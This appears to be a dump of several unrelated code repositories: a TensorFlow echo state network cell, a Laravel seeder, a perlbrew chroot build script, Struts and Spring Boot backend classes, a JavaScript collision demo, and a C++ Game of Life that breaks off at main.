        diag_a = tf.diag(a)
        _wr = math_ops.matmul(diag_a, wr) + b
        wr_norm2 = math_ops.sqrt(math_ops.reduce_sum(math_ops.square(_wr)))
        return wr_norm2
def getReservoirWeights(self):
    """Return the (non-trainable) reservoir weight variable from 'rnn/ESNIPCell'."""
    with vs.variable_scope('rnn/ESNIPCell', reuse=tf.AUTO_REUSE):
        wr = vs.get_variable("ReservoirMatrix", [self._num_units, self._num_units], dtype=self._dtype,
                             trainable=False, initializer=self._wr_initializer)
        return wr
def __call__(self, inputs, state, scope=None):
    """ Run one step of ESN Cell
    Args:
        inputs: `2-D Tensor` with shape `[batch_size x input_size]`.
        state: `2-D Tensor` with shape `[batch_size x self.state_size]`.
        scope: VariableScope for the created subgraph; defaults to class `ESNCell`.
    Returns:
        A tuple `(output, new_state)`.
        NOTE(review): the leaky-integration formula
        `(1 - leaky) * state + leaky * activation(...)` mentioned in the
        original docstring is NOT applied below (it is commented out); the
        returned output is `activation(in_mat @ weights_mat + b)` directly.
    Raises:
        ValueError: if `inputs` or `state` tensor size mismatch the previously provided dimension.
    """
    inputs = convert_to_tensor(inputs)
    input_size = inputs.get_shape().as_list()[1]
    dtype = inputs.dtype
    # Create/reuse the reservoir (wr), input weights (win), gain (a) and bias (b)
    with vs.variable_scope(self.__scope or type(self).__name__, reuse=tf.AUTO_REUSE):
        win = vs.get_variable("InputMatrix", [input_size, self._num_units], dtype=dtype,
                              trainable=False, initializer=self._win_initializer)
        wr = vs.get_variable("ReservoirMatrix", [self._num_units, self._num_units], dtype=dtype,
                             trainable=False, initializer=self._wr_initializer)
        # IP parameters: gain a and bias b
        a = vs.get_variable("GainVector", [self._num_units], dtype=dtype,
                            trainable=True, initializer=tf.ones_initializer())
        b = vs.get_variable("Bias", [self._num_units], dtype=dtype, trainable=True,
                            initializer=tf.zeros_initializer())
        diag_a = tf.diag(a)
        _wr = math_ops.matmul(diag_a, wr)
        _win = math_ops.matmul(win, diag_a)  # multiplication order inverted on purpose
        in_mat = array_ops.concat([inputs, state], axis=1)
        weights_mat = array_ops.concat([_win, _wr], axis=0)  # unchanged because of the inverted order above
        # previous standalone bias term removed
        # Pre-activation x and output y used by IP
        x_a = math_ops.matmul(in_mat, weights_mat) + b
        y_ip = self._activation(x_a)
        # output = (1 - self._leaky) * state + self._leaky * self._activation(math_ops.matmul(in_mat, weights_mat)+b)
        # IP update rules for a and b (how to pick fermi vs tanh — an if?)
        # Rule for the tanh case (kept for reference, currently disabled):
        # g_b = -self._learning_rate * (-(self._mean / tf.pow(self._std, 2)) + (y_ip / tf.pow(self._std, 2)) * (
        #     2 * tf.pow(self._std, 2) + 1 - tf.pow(y_ip, 2) + self._mean * y_ip))
        # g_a = self._learning_rate / a + g_b * x_a
        # _a=a+g_a
        # _b=b+g_b
        # a.assign(tf.squeeze(_a))
        # b.assign(tf.squeeze(_b))
        return y_ip, y_ip
        # the return is (output, new_state)
| 804a1ceacce938854d8c2fac3d73e8495ad91135 | [
"Markdown",
"Python"
] | 3 | Python | JeanCarloMacan/TFM | 142f30fd8a33b1ab76ee410096a832f1a37be2c4 | bcc359b91c25d5d5151bc34242e4f90bba6f75c7 |
refs/heads/main | <file_sep><?php
namespace Database\Seeders;
use Illuminate\Database\Seeder;
use Illuminate\Support\Facades\DB;
class ProductSeeder extends Seeder
{
    /**
     * Run the database seeds.
     *
     * Seeds five demo products. The array key `descriptoin` (sic) presumably
     * matches the actual column name created by the migration — verify before
     * renaming it here.
     *
     * @return void
     */
    public function run()
    {
        // Bug fix: Query\Builder::insert() takes a SINGLE argument — either
        // one row (assoc array) or an array of rows. The original call passed
        // each row as a separate argument, so only the first product was ever
        // inserted; wrapping them in one array inserts all five.
        DB::table('products')->insert([
            [
                'name'=>'LG mobile',
                'price'=>'200$',
                'descriptoin'=>'Lorem ipsum dolor sit amet consectetur adipisicing elit. Perspiciatis, soluta.',
                'category'=>'mobile',
                'gallery'=>'https://www.savol-javob.com/wp-content/uploads/2020/05/Paket_Kado_Gift_Valentine_Teddy_Bear_08_Buket_Bunga-869x1024.jpg'
            ],
            [
                'name'=>'XuwaWei mobile',
                'price'=>'200$',
                'descriptoin'=>'Lorem ipsum dolor sit amet consectetur adipisicing elit. Perspiciatis, soluta.',
                'category'=>'mobile',
                'gallery'=>'https://pbs.twimg.com/media/CmOloNaWYAAWnOL.jpg'
            ],
            [
                'name'=>'Samsung mobile',
                'price'=>'200$',
                'descriptoin'=>'Lorem ipsum dolor sit amet consectetur adipisicing elit. Perspiciatis, soluta.',
                'category'=>'mobile',
                'gallery'=>'https://pbs.twimg.com/media/DxIH8eYX0AE98My.jpg:large'
            ],
            [
                'name'=>'Nokis mobile',
                'price'=>'200$',
                'descriptoin'=>'Lorem ipsum dolor sit amet consectetur adipisicing elit. Perspiciatis, soluta.',
                'category'=>'mobile',
                'gallery'=>'https://www.savol-javob.com/wp-content/uploads/2020/05/4MlyYBXUYCmMN27UC6aXF24sXclH0wPqx6VnWsVQf5ZJMgfKtxcKxpE_bJ4q1BLwkm_t-NkLENPAU14tVFnlI8G4s6BRMVRZvXZvEeuDUsPrGbiM5yezK5Mx9zpVJP.jpg'
            ],
            [
                'name'=>'RedME mobile',
                'price'=>'200$',
                'descriptoin'=>'Lorem ipsum dolor sit amet consectetur adipisicing elit. Perspiciatis, soluta.',
                'category'=>'mobile',
                'gallery'=>'https://www.savol-javob.com/wp-content/uploads/2020/05/4MlyYBXUYCmMN27UC6aXF24sXclH0wPqx6VnWsVQfobIVuPbN8dahtCfaD5fUTfV90497dluASPQxr68hLnAY7V44_UBoSQJ-BMvdPvC1vINvz9A-768x768.jpg'
            ]
        ]);
    }
}
| 4e648faae2db5dd26cb989829cb024ff5a50e3a1 | [
"PHP"
] | 1 | PHP | Quvonchbek-1227/EccomrsePr | 6e8f1a1b902c52f57b762f402d8105fc1c7fc3e9 | 5f058dbeaa1905e00625cf4d3f057c95c23d1ee6 |
refs/heads/master | <repo_name>perlbot/evalserver-config<file_sep>/gensystem.sh
#!/bin/bash
# Build a Debian stretch chroot in ./system with perlbrew and perl-5.24.1.
set -e
set -u

mkdir system
debootstrap stretch system

# Script executed *inside* the chroot: installs build tools and perlbrew,
# builds perl-5.24.1, switches to it and installs cpanm.
cat > system/install.sh <<'EOF'
#!/bin/bash
set -e
set -u
# Fix: a fresh debootstrap chroot has no package lists, and apt must not
# prompt in this non-interactive context — update first and pass -y.
export DEBIAN_FRONTEND=noninteractive
apt-get update
apt-get install -y build-essential perlbrew
export PERLBREW_ROOT=/opt/perlbrew
mkdir -p $PERLBREW_ROOT
perlbrew init
perlbrew install perl-5.24.1
perlbrew switch perl-5.24.1
perlbrew install-cpanm
EOF

# Make perlbrew visible to every login shell inside the chroot.
cat > system/etc/profile.d/perlbrew.sh << EOF
export PERLBREW_ROOT=/opt/perlbrew
EOF

chmod +x system/install.sh

# Run the installation inside the chroot: installs perlbrew, switches to
# 5.24.1, and installs cpanm.
chroot system /install.sh

echo The system is now ready to be used
| d3c969a53ec88ad736474096a3f63ca8891b80e6 | [
"Shell"
] | 1 | Shell | perlbot/evalserver-config | d2ba7eec9e750f4afd80c72acda8cd120bb69f63 | a68fe9037c861fbb0561b1d1d954ddbe06476256 |
refs/heads/master | <file_sep>package com.im.stockapp.actions;
import java.io.File;
import java.util.List;
import javax.servlet.ServletContext;
import org.apache.commons.io.FileUtils;
import org.apache.struts2.ServletActionContext;
import com.im.stockapp.models.Customer;
import com.im.stockapp.utils.DB;
import com.opensymphony.xwork2.ActionSupport;
/**
 * Struts2 action providing CRUD for {@link Customer} records, including
 * copying the uploaded photo into the webapp's /uploads directory.
 */
public class CustomerAction extends ActionSupport{

    // Form-backed customer, populated by Struts parameter interception.
    private Customer customer;
    // Listing rendered by the result pages.
    private List<Customer> customerList;

    /** Default action: load all customers for display. */
    public String execute() {
        customerList = (List<Customer>)DB.list("Customer");
        return SUCCESS;
    }

    /**
     * Persists the customer, then copies the uploaded photo to /uploads/.
     * NOTE(review): the row is saved BEFORE the file copy; if the copy fails
     * the action returns INPUT but the record is already in the DB without
     * its photo — confirm this ordering is intended.
     */
    public String add() {
        DB.save(customer);
        try {
            ServletContext servletContext = ServletActionContext.getServletContext();
            String filePath = servletContext.getRealPath("/uploads/");
            File fileToCreate = new File(filePath, customer.getPhotoFileName());
            FileUtils.copyFile(customer.getPhoto(), fileToCreate);
        }catch(Exception e) {
            e.printStackTrace();
            addActionError(e.getMessage());
            return INPUT;
        }
        customerList =(List<Customer>)DB.list("Customer");
        return SUCCESS;
    }

    /** Deletes the customer and refreshes the listing. */
    public String delete() {
        DB.delete(customer);
        customerList =(List<Customer>)DB.list("Customer");
        return SUCCESS;
    }

    public Customer getCustomer() {
        return customer;
    }

    public void setCustomer(Customer customer) {
        this.customer = customer;
    }

    public List<Customer> getCustomerList() {
        return customerList;
    }

    public void setCustomerList(List<Customer> customerList) {
        this.customerList = customerList;
    }
}
<file_sep>package com.im.stockapp.actions;
import java.io.File;
import java.util.List;
import javax.servlet.ServletContext;
import org.apache.commons.io.FileUtils;
import org.apache.struts2.ServletActionContext;
import com.im.stockapp.models.Item;
import com.im.stockapp.utils.DB;
import com.opensymphony.xwork2.ActionSupport;
/**
 * Struts2 action providing CRUD for {@link Item} records, including
 * copying the uploaded photo into the webapp's /uploads directory.
 */
public class ItemAction extends ActionSupport{

    // Form-backed item, populated by Struts parameter interception.
    private Item item;
    // Listing rendered by the result pages.
    private List<Item> itemList;

    /** Default action: load all items for display. */
    public String execute() {
        itemList = (List<Item>)DB.list("Item");
        return SUCCESS;
    }

    /**
     * Persists the item, then copies the uploaded photo to /uploads/.
     * NOTE(review): the row is saved BEFORE the file copy; a failed copy
     * returns INPUT but leaves the record in the DB — confirm intended.
     */
    public String add() {
        DB.save(item);
        try {
            ServletContext servletContext = ServletActionContext.getServletContext();
            String filePath = servletContext.getRealPath("/uploads/");
            File fileToCreate = new File(filePath, item.getPhotoFileName());
            FileUtils.copyFile(item.getPhoto(), fileToCreate);
        }catch(Exception e) {
            e.printStackTrace();
            addActionError(e.getMessage());
            return INPUT;
        }
        itemList =(List<Item>)DB.list("Item");
        return SUCCESS;
    }

    /** Deletes the item and refreshes the listing. */
    public String delete() {
        DB.delete(item);
        itemList =(List<Item>)DB.list("Item");
        return SUCCESS;
    }

    public Item getItem() {
        return item;
    }

    public void setItem(Item item) {
        this.item = item;
    }

    public List<Item> getItemList() {
        return itemList;
    }

    public void setItemList(List<Item> itemList) {
        this.itemList = itemList;
    }
}
| 372d840bc51e99d5d5483e3664cadbaf10a09333 | [
"Java"
] | 2 | Java | ManodyaAbeysinghe/StockApp | 4e688b9ddfee7657b8fd28771e1c0b82544a7366 | ca25ecf9f5278d7095528446eae37d21725a447f |
refs/heads/master | <repo_name>chandanshukla1989/devopcode<file_sep>/main.sh
# End-to-end rebuild pipeline: terraform-provision adhoc-vm, configure it with
# ansible, snapshot it to a GCP image, then recreate runner-vm from that image.
terraform init /home/shukla_chandan64/gitpush
# Remove the previous image and VM so they can be recreated from scratch.
gcloud -q compute images delete adhocvm-image --project=imperial-legacy-232115
gcloud -q compute instances delete adhoc-vm --project=imperial-legacy-232115 --zone=us-west1-a
# Reset terraform state before re-applying.
> /home/shukla_chandan64/gitpush/terraform.tfstate
terraform apply -auto-approve /home/shukla_chandan64/gitpush
######################### prepare /etc/hosts entry for the new adhoc-vm
# Extract the VM's internal IP from the terraform state and map it to "adhoc-vm".
cat terraform.tfstate|grep network_ip|cut -d'"' -f4|awk '{print $1" adhoc-vm"}' > host_etc
sudo bash -c 'cat host_etc > /etc/hosts'
# Drop any stale SSH host key and warm the known_hosts entry.
ssh-keygen -f "/home/shukla_chandan64/.ssh/known_hosts" -R adhoc-vm
chmod 400 /home/shukla_chandan64/keyfiles/privatekey.pem
ssh -o "StrictHostKeyChecking=no" -i /home/shukla_chandan64/keyfiles/privatekey.pem adhoc-vm "echo Adding Keys in Host"
######################### prepare hostlist for ansible
#echo -e "[adhoc-vm]\nadhoc-vm ansible_ssh_private_key_file=/home/shukla_chandan64/gitpush/keyfiles/privatekey.pem\n[runner-vm]\nrunner-vm ansible_ssh_private_key_file=/home/shukla_chandan64/gitpush/keyfiles/privatekey.pem" > /home/shukla_chandan64/gitpush/ansible_playbooks/ansible_host
cat /etc/hosts
cat /home/shukla_chandan64/gitpush/ansible_playbooks/ansible_host
# Give the VM a moment to finish booting before configuring it.
sleep 10s
ansible-playbook /home/shukla_chandan64/gitpush/ansible_playbooks/pipinstall.yaml -i /home/shukla_chandan64/gitpush/ansible_playbooks/ansible_host
ansible-playbook /home/shukla_chandan64/gitpush/ansible_playbooks/install-python-packages.yaml -i /home/shukla_chandan64/gitpush/ansible_playbooks/ansible_host
# Stop the configured VM and snapshot its disk into a reusable image.
gcloud compute instances stop adhoc-vm --zone=us-west1-a
gcloud compute images create adhocvm-image --project=imperial-legacy-232115 --source-disk=adhoc-vm --source-disk-zone=us-west1-a
# Fresh state for the restore-from-image apply, then recreate runner-vm.
> ./terraform.tfstate
gcloud -q compute instances delete runner-vm --project=imperial-legacy-232115 --zone=us-west1-a
terraform apply -auto-approve /home/shukla_chandan64/gitpush/restore_from_image
ssh-keygen -f "/home/shukla_chandan64/.ssh/known_hosts" -R runner-vm
# Append the new runner-vm IP to /etc/hosts.
cat terraform.tfstate|grep network_ip|cut -d'"' -f4|awk '{print $1" runner-vm"}' > host_etc
sudo bash -c 'cat host_etc >> /etc/hosts'
| 90ee818b2b825ef8af23a94cfa4396ded0235f56 | [
"Shell"
] | 1 | Shell | chandanshukla1989/devopcode | a2c16f56761fb67ede1df625daf79cfba875ef5b | 3e7fbe00c0a99c091291869a254da4276775f52e |
refs/heads/main | <file_sep>package com.ims.springjwt.controllers;
import com.ims.springjwt.bean.EmailComponent;
import com.ims.springjwt.services.EmailService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestMapping;
@Controller
public class EmailController {

    /** Component that performs the actual mail delivery. */
    @Autowired
    private EmailComponent emailComponent;

    /**
     * Sends a fixed test e-mail via {@link EmailComponent}.
     *
     * Cleanup: removed the commented-out {@code EmailService}-based variant
     * and the commented {@code @PostMapping} — the live behavior is unchanged.
     * Note that {@code @RequestMapping} without a method attribute maps ALL
     * HTTP methods to this handler.
     */
    @RequestMapping(value = "/sendmail")
    public void sendEmail() {
        System.out.println("controller done..!");
        emailComponent.sendMail("<EMAIL>", "Test Subject", "Test mail");
        System.out.println("controller done2..!");
    }
}
<file_sep>package com.ims.springjwt.services;
import com.ims.springjwt.models.User;
import com.ims.springjwt.payload.request.ForgotPassword;
import org.springframework.web.bind.annotation.RequestBody;
import java.util.List;
/**
 * Application-level user operations beyond plain repository CRUD.
 */
public interface UserService {

    // NOTE(review): @RequestBody on an interface-method parameter has no
    // binding effect here (binding happens at the controller) — confirm and
    // consider removing it from the service contract.
    User forgotPassword(@RequestBody ForgotPassword forgotPassword);

    /**
     * Users in the "student-like" role — presumably backed by the role-filtered
     * native query in UserRepository (role_id = 1); verify the role id mapping.
     */
    List<User> fetchUserLikeStudent();
}
<file_sep>package com.ims.springjwt.controllers;
import com.ims.springjwt.models.Buyer;
import com.ims.springjwt.models.OrderMaster;
import com.ims.springjwt.services.OrderMasterService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.*;
import java.util.List;
@RestController
@CrossOrigin(origins = "*", allowedHeaders = "*")
@RequestMapping("/api")
public class OrderMasterController {

    /** Service layer performing the actual buyer / order-master operations. */
    @Autowired
    OrderMasterService orderMasterService;

    /** GET /api/getBuyer — list every buyer. */
    @GetMapping("/getBuyer")
    public List<Buyer> getBuyer() {
        return this.orderMasterService.getBuyer();
    }

    /** POST /api/saveOrderMasterList — persist a batch of order masters. */
    @PostMapping("/saveOrderMasterList")
    public List<OrderMaster> saveOrderMasterList(@RequestBody List<OrderMaster> orderMasterList) {
        List<OrderMaster> savedBatch = this.orderMasterService.saveOrderMasterList(orderMasterList);
        return savedBatch;
    }

    /** POST /api/saveOrderMaster — persist a single order master. */
    @PostMapping("/saveOrderMaster")
    public OrderMaster saveOrderMaster(@RequestBody OrderMaster orderMaster) {
        OrderMaster savedEntity = this.orderMasterService.saveOrderMaster(orderMaster);
        return savedEntity;
    }
}
<file_sep>package com.ims.springjwt.services.impl;
import com.ims.springjwt.models.Category;
import com.ims.springjwt.models.Item;
import com.ims.springjwt.models.StyleMaster;
import com.ims.springjwt.repository.CategoryRepository;
import com.ims.springjwt.repository.ItemRepository;
import com.ims.springjwt.repository.StyleMasterRepository;
import com.ims.springjwt.services.StyleMasterService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import java.util.List;
@Service
public class StyleMasterServiceimpl implements StyleMasterService {

    @Autowired
    CategoryRepository categoryRepository;

    @Autowired
    ItemRepository itemRepository;

    @Autowired
    StyleMasterRepository styleMasterRepository;

    // NOTE(review): method names below start with an uppercase letter,
    // against Java convention — they mirror the StyleMasterService interface.

    /** All categories (used when building an order master). */
    @Override
    public List<Category> OrderMasterCategory() {
        return categoryRepository.findAll();
    }

    /** All items (used when building an order master). */
    @Override
    public List<Item> OrderMasterItem() {
        return itemRepository.findAll();
    }

    /** Persist a batch of style masters. */
    @Override
    public List<StyleMaster> saveStyleMaster(List<StyleMaster> styleMasterList) {
        return styleMasterRepository.saveAll(styleMasterList);
    }

    /** All style masters. */
    @Override
    public List<StyleMaster> getStyleMaster() {
        return styleMasterRepository.findAll();
    }

    /** Delete a style master by id and return a confirmation message. */
    @Override
    public String deleteProduct(Long id) {
        styleMasterRepository.deleteById(id);
        return "product removed !! " + id;
    }

    /** Items belonging to the given category id. */
    @Override
    public List<Item> OrderMasterItemFindByCategory(Long id) {
        return itemRepository.findByCategory_Id(id);
    }
}
<file_sep>package com.ims.springjwt.repository;
import java.util.List;
import java.util.Optional;
import com.ims.springjwt.models.User;
import org.springframework.data.jpa.repository.JpaRepository;
import org.springframework.data.jpa.repository.Query;
import org.springframework.stereotype.Repository;
/**
 * Spring Data repository for {@link User} entities, with derived lookups by
 * username/email and one native role-filtered query.
 */
@Repository
public interface UserRepository extends JpaRepository<User, Long> {
    Optional<User> findByUsername(String username);

    Optional<User> findByEmail(String email);

    Boolean existsByUsername(String username);

    Boolean existsByEmail(String email);

    // Native query: users joined to user_roles where role_id = 1.
    // NOTE(review): the meaning of role id 1 depends on the roles table
    // seed order — confirm it is the intended role.
    @Query(value ="select * from users INNER JOIN user_roles ur on users.id = ur.user_id where role_id = 1",nativeQuery = true)
    List<User> fetchUser();
}
<file_sep>package com.ims.springjwt.models;
import lombok.*;
import javax.persistence.*;
/**
 * JPA entity for a garment style, linked to a {@link Category} and an
 * {@link Item}. Getters/setters/constructors are generated by Lombok.
 */
@Data
@AllArgsConstructor
@NoArgsConstructor
@Setter
@Getter
@Entity
public class StyleMaster {

    // Database-generated primary key.
    @Id
    @GeneratedValue(strategy= GenerationType.IDENTITY)
    private Long id;

    // NOTE(review): purpose of this secondary id is not evident from this
    // file — presumably a client-side/temporary id; confirm with callers.
    private Long idMy;

    private String itemCode;
    private String styleCode;
    private String styleName;
    private int quantity;
    private String status;
    private String type;

    // Owning category; DETACH-only cascade so category rows are never
    // modified through a style master.
    @ManyToOne(cascade = {CascadeType.DETACH})
    @JoinColumn(name = "CategoryId", referencedColumnName = "id")
    private Category category;

    // Owning item; same DETACH-only cascade as above.
    @ManyToOne(cascade = {CascadeType.DETACH})
    @JoinColumn(name = "ItemId", referencedColumnName = "id")
    private Item item;

    private double consumption;
}
<file_sep># ousl-s-backend<file_sep>package com.ims.springjwt.repository;
import com.ims.springjwt.models.OrderMaster;
import com.ims.springjwt.models.Role;
import org.springframework.data.jpa.repository.JpaRepository;
import org.springframework.stereotype.Repository;
/** Spring Data repository for {@link OrderMaster} entities (CRUD only). */
@Repository
public interface OrderMasterRepository extends JpaRepository<OrderMaster, Long> {
}
| 4aea447718697bea9056cb12d841944adaa596f7 | [
"Markdown",
"Java"
] | 8 | Java | MohamedNifrad/ousl-s-backend | b07a34f6b739ebef4a1a115be027f302bfb2efd1 | f429f6acf91a3df9bcb1a3fce455f197b450be44 |
refs/heads/master | <file_sep>import "./styles.css";
import Game from "/src/game";
// Grab the page's game canvas and its 2D drawing context.
let canvas = document.getElementById("gameScreen");
let ctx = canvas.getContext("2d");

/*
let game = new Game(GAME_WIDTH, GAME_HEIGHT);

let lastTime = 0;
function gameLoop(timestamp) {
let deltaTime = timestamp - lastTime;
lastTime = timestamp;

ctx.clearRect(0, 0, GAME_WIDTH, GAME_HEIGHT);
game.update(deltaTime);
game.draw(ctx);

requestAnimationFrame(gameLoop);
}

requestAnimationFrame(gameLoop); */

// detect-collisions supplies the collision system; one shared Result object
// receives overlap data from each narrow-phase test.
const { Collisions } = require("detect-collisions");
const result = Collisions.createResult();
export default class Tank {
constructor() {
const width = window.innerWidth;
const height = window.innerHeight;
const collisions = new Collisions();
this.element = document.createElement("div");
this.canvas = document.getElementById("gameScreen"); //document.createElement('canvas')
this.context = this.canvas.getContext("2d");
this.collisions = collisions;
this.bodies = [];
this.canvas.width = width;
this.canvas.height = height;
this.player = null;
this.oneBall = null;
this.up = false;
this.down = false;
this.left = false;
this.right = false;
this.element.innerHTML = `
<div><b>W, S</b> - Accelerate/Decelerate</div>
<div><b>A, D</b> - Turn</div>
<div><label><input id="bvh" type="checkbox"> Show Bounding Volume Hierarchy</label></div>
`;
const updateKeys = e => {
const keydown = e.type === "keydown";
const key = e.key.toLowerCase();
key === "w" && (this.up = keydown);
key === "s" && (this.down = keydown);
key === "a" && (this.left = keydown);
key === "d" && (this.right = keydown);
};
document.addEventListener("keydown", updateKeys);
document.addEventListener("keyup", updateKeys);
this.bvh_checkbox = this.element.querySelector("#bvh");
this.element.appendChild(this.canvas);
this.game = new Game(width, height);
this.createPlayer(400, 300);
this.createMap(width, height);
let lastTime = 0;
const frame = timestamp => {
this.update();
let deltaTime = timestamp - lastTime;
lastTime = timestamp;
//ctx.clearRect(0, 0, width, height);
this.game.update(deltaTime);
this.game.draw(ctx);
requestAnimationFrame(frame);
};
frame();
}
update() {
this.handleInput();
this.processGameLogic();
this.handleCollisions();
this.render();
}
handleInput() {
this.up && (this.player.velocity += 0.1);
this.down && (this.player.velocity -= 0.1);
this.left && (this.player.angle -= 0.04);
this.right && (this.player.angle += 0.04);
}
processGameLogic() {
const x = Math.cos(this.player.angle);
const y = Math.sin(this.player.angle);
if (this.player.velocity > 0) {
this.player.velocity -= 0.05;
if (this.player.velocity > 3) {
this.player.velocity = 3;
}
} else if (this.player.velocity < 0) {
this.player.velocity += 0.05;
if (this.player.velocity < -2) {
this.player.velocity = -2;
}
}
if (!Math.round(this.player.velocity * 100)) {
this.player.velocity = 0;
}
if (this.player.velocity) {
this.player.x += x * this.player.velocity;
this.player.y += y * this.player.velocity;
}
this.oneBall.x = this.game.gameObjects[0].position.x;
this.oneBall.y = this.game.gameObjects[0].position.y;
}
handleCollisions() {
this.collisions.update();
const potentials = this.player.potentials();
// Negate any collisions
for (const body of potentials) {
if (this.player.collides(body, result)) {
this.player.x -= result.overlap * result.overlap_x;
this.player.y -= result.overlap * result.overlap_y;
this.player.velocity *= 0.9;
}
}
const potentials2 = this.oneBall.potentials();
// Negate any collisions
for (const body of potentials2) {
if (this.oneBall.collides(body, result)) {
this.oneBall.x -= result.overlap * result.overlap_x;
this.oneBall.y -= result.overlap * result.overlap_y;
this.oneBall.velocity.x = -2 * result.overlap_x;
this.oneBall.velocity.y = -2 * result.overlap_y;
}
}
this.game.gameObjects[0].position.x = this.oneBall.x;
this.game.gameObjects[0].position.y = this.oneBall.y;
this.game.gameObjects[0].velocity.x = this.oneBall.velocity.x;
this.game.gameObjects[0].velocity.y = this.oneBall.velocity.y;
}
render() {
this.context.fillStyle = "#000000";
this.context.fillRect(0, 0, this.canvas.width, this.canvas.height);
this.context.strokeStyle = "#FFFFFF";
this.context.beginPath();
this.collisions.draw(this.context);
this.context.stroke();
if (this.bvh_checkbox.checked) {
this.context.strokeStyle = "#00FF00";
this.context.beginPath();
this.collisions.drawBVH(this.context);
this.context.stroke();
}
}
createPlayer(x, y) {
this.player = this.collisions.createPolygon(
x,
y,
[[-20, -10], [20, -10], [20, 10], [-20, 10]],
0.2
);
this.player.velocity = 0;
}
createMap(width, height) {
// World bounds
this.collisions.createPolygon(0, 0, [[0, 0], [width, 0]]);
this.collisions.createPolygon(0, 0, [[width, 0], [width, height]]);
this.collisions.createPolygon(0, 0, [[width, height], [0, height]]);
this.collisions.createPolygon(0, 0, [[0, height], [0, 0]]);
// Factory
this.collisions.createPolygon(
100,
100,
[[-50, -50], [50, -50], [50, 50], [-50, 50]],
0.4
);
this.collisions.createPolygon(
190,
105,
[[-20, -20], [20, -20], [20, 20], [-20, 20]],
0.4
);
/*
this.collisions.createCircle(170, 140, 8);
this.collisions.createCircle(185, 155, 8);
this.collisions.createCircle(165, 165, 8);
this.collisions.createCircle(145, 165, 8);
*/
this.game.gameObjects.forEach(
ball =>
(this.oneBall = this.collisions.createCircle(
ball.position.x,
ball.position.y,
ball.size
))
);
this.oneBall.velocity = { x: 2.0, y: 2.0 };
// Airstrip
this.collisions.createPolygon(
230,
50,
[[-150, -30], [150, -30], [150, 30], [-150, 30]],
0.4
);
// HQ
this.collisions.createPolygon(
100,
500,
[[-40, -50], [40, -50], [50, 50], [-50, 50]],
0.2
);
this.collisions.createCircle(180, 490, 20);
this.collisions.createCircle(175, 540, 20);
// Barracks
this.collisions.createPolygon(
400,
500,
[[-60, -20], [60, -20], [60, 20], [-60, 20]],
1.7
);
this.collisions.createPolygon(
350,
494,
[[-60, -20], [60, -20], [60, 20], [-60, 20]],
1.7
);
// Mountains
this.collisions.createPolygon(750, 0, [[0, 0], [-20, 100]]);
this.collisions.createPolygon(750, 0, [[-20, 100], [30, 250]]);
this.collisions.createPolygon(750, 0, [[30, 250], [20, 300]]);
this.collisions.createPolygon(750, 0, [[20, 300], [-50, 320]]);
this.collisions.createPolygon(750, 0, [[-50, 320], [-90, 500]]);
this.collisions.createPolygon(750, 0, [[-90, 500], [-200, 600]]);
// Lake
this.collisions.createPolygon(550, 100, [
[-60, -20],
[-20, -40],
[30, -30],
[60, 20],
[60, 70],
[40, 120],
[-30, 110],
[-80, 90],
[-110, 50],
[-100, 20]
]);
}
}
/* function random(min, max) {
return Math.floor(Math.random() * max) + min;
} */

// CommonJS interop shim.
// NOTE(review): reassigning the local `exports` binding does not change
// module.exports — confirm this export path is actually used.
if (typeof exports !== "undefined") {
  exports = Tank;
  exports.default = exports;
}

// Bootstrap: create the demo and attach its UI (help text + canvas) to the page.
let example;

example = new Tank();
document.body.appendChild(example.element);
| 9a644aa5909961456bfadd24605de776057c0b4c | [
"JavaScript"
] | 1 | JavaScript | santiHerranz/BouncingBalls | 190d1eb1695a54546069935bfa867bc7fdc045ab | 83ed5590777704681c6389b8abc28c1b3e89cdc6 |
refs/heads/master | <file_sep>#include <SFML/Graphics.hpp>
#include <SFML/Window/Keyboard.hpp>
#include <vector>
#include <iostream>
#include <math.h>
// Window dimensions in pixels and grid resolution (cells per row/column).
const unsigned int Width = 900;
const unsigned int Height = 900;
const unsigned int cellsWide = 100;
// Pixel size of one square cell.
float cellSize = (float)Width / cellsWide;
// Seconds between generation updates.
float timeBetweenUpdates = 1;
// One square of the life grid: knows its grid coordinates, alive/dead state,
// and the SFML rectangle used to draw it.
class cell {
public:
    // True while the cell is alive.
    bool isAlive() {
        return this->alive;
    }
    // Mark the cell dead and recolor it (black fill, white outline).
    void kill() {
        this->alive = false;
        this->body.setFillColor(sf::Color::Black);
        this->body.setOutlineColor(sf::Color::White);
    }
    // Mark the cell alive and recolor it (white fill, black outline).
    void birth() {
        this->alive = true;
        this->body.setFillColor(sf::Color::White);
        this->body.setOutlineColor(sf::Color::Black);
    }
    // Drawable rectangle for this cell (returned by value).
    sf::RectangleShape getBody() {
        return this->body;
    }
    int getX() {
        return this->x;
    }
    int getY() {
        return this->y;
    }
    // Construct a dead cell at grid position (xposition, yposition); the
    // rectangle is placed at the matching pixel coordinates.
    cell(int xposition, int yposition) {
        this->x = xposition;
        this->y = yposition;
        this->alive = false;
        this->body.setFillColor(sf::Color::Black);
        this->body.setSize(sf::Vector2f(cellSize, cellSize));
        this->body.setPosition(sf::Vector2f((this->x) * cellSize, (this->y) * cellSize));
        this->body.setOutlineColor(sf::Color::White);
        this->body.setOutlineThickness(0.5);
    }

private:
    int x, y; // x and y positions in the grid
    bool alive; // tracks the state of the cell
    sf::RectangleShape body; // the rectangle that represents the cell
};
// Grid of cells, indexed [column][row]; populated in main().
std::vector<std::vector<cell>> cells; // matrix of cells

// Count the live neighbors of cell c (8-neighborhood; cells outside the grid
// are ignored). The cell itself is never counted.
int numNeighbors(cell c) {
    int count = 0;
    for (int i = c.getX() - 1; i < c.getX() + 2; i++) {
        for (int j = c.getY() - 1; j < c.getY() + 2; j++) {
            if (i < 0 || j < 0) { continue; }
            // Fix: compare against the signed size instead of `size()-1`.
            // The original `i > cells.size()-1` mixed signed/unsigned and
            // underflowed to SIZE_MAX for an empty grid, which would index
            // out of bounds below.
            if (i >= static_cast<int>(cells.size())) { continue; }
            if (j >= static_cast<int>(cells[i].size())) { continue; }
            if (cells[i][j].isAlive()) {
                count++;
            }
        }
    }
    if (c.isAlive()) { count--; } // the loop counted the cell itself; undo that
    return count;
}
// Game-of-life driver: builds the grid, lets the user toggle cells with the
// mouse and pause with Space, and steps one generation every
// timeBetweenUpdates seconds using Conway's rules.
int main()
{
